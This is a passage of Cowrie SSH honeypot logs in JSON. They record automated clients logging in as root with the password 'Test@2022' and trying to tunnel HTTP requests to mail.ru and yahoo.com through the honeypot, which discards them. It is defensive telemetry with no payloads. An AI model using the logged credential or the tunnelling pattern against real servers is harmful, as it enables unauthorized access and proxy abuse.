57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:41.865304Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.116403Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27803,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27803","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.167468Z","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.217751Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":6835,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6835","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.360876Z","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.411514Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":28148,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28148","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.556562Z","session":"c2bfb93dfc55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.606840Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.657941Z","src_ip":"77.83.207.83","session":"c2bfb93dfc55"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35742,"dst_ip":"1.2.3.4","dst_port":22,"session":"5216cfb365f6","protocol":"ssh","message":"New connection: 77.83.207.83:35742 (1.2.3.4:22) [session: 5216cfb365f6]","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.706985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.717175Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:42.757624Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.008775Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21351,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21351","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.061062Z","session":"5216cfb365f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.111858Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44578,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d387251d76e","protocol":"ssh","message":"New connection: 212.227.235.229:44578 (1.2.3.4:22) [session: 9d387251d76e]","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.143830Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17013,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17013","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.256718Z","session":"5216cfb365f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.307304Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":16514,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16514","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.448962Z","session":"5216cfb365f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.499568Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.551890Z","src_ip":"77.83.207.83","session":"5216cfb365f6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35862,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c3bd7a51f5","protocol":"ssh","message":"New connection: 77.83.207.83:35862 (1.2.3.4:22) [session: c2c3bd7a51f5]","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.601533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.602641Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.653352Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.899860Z","src_ip":"212.227.235.229","session":"9d387251d76e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.900519Z","src_ip":"212.227.235.229","session":"9d387251d76e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.905152Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1631,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1631","sensor":"my-vps","timestamp":"2025-08-31T03:52:43.957260Z","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.007774Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":32355,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32355","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.148880Z","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.199294Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18468,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18468","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.340877Z","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.391291Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.442542Z","src_ip":"77.83.207.83","session":"c2c3bd7a51f5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35999,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44fb3a5a289","protocol":"ssh","message":"New connection: 77.83.207.83:35999 (1.2.3.4:22) [session: b44fb3a5a289]","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.491780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.493725Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.544447Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.797780Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5931,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5931","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.849396Z","session":"b44fb3a5a289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:44.900544Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":11291,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11291","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.045108Z","session":"b44fb3a5a289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.095878Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.session.closed","duration":12.766772270202637,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.112732Z","src_ip":"212.227.235.229","session":"dbee577dddb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":25623,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25623","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.241256Z","session":"b44fb3a5a289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.292108Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65156,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9fc07a429ed","protocol":"telnet","message":"New connection: 212.227.235.229:65156 (1.2.3.4:23) [session: c9fc07a429ed]","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.340032Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.343652Z","src_ip":"77.83.207.83","session":"b44fb3a5a289"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36093,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e5de88a29d7","protocol":"ssh","message":"New connection: 77.83.207.83:36093 (1.2.3.4:22) [session: 5e5de88a29d7]","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.392372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.402821Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.442695Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.691387Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.session.closed","duration":"65.3","message":"Connection lost after 65.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.701272Z","src_ip":"212.227.125.160","session":"86eacc4d7083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30839,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30839","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.742116Z","session":"5e5de88a29d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.792065Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":6413,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6413","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.944066Z","session":"5e5de88a29d7"}
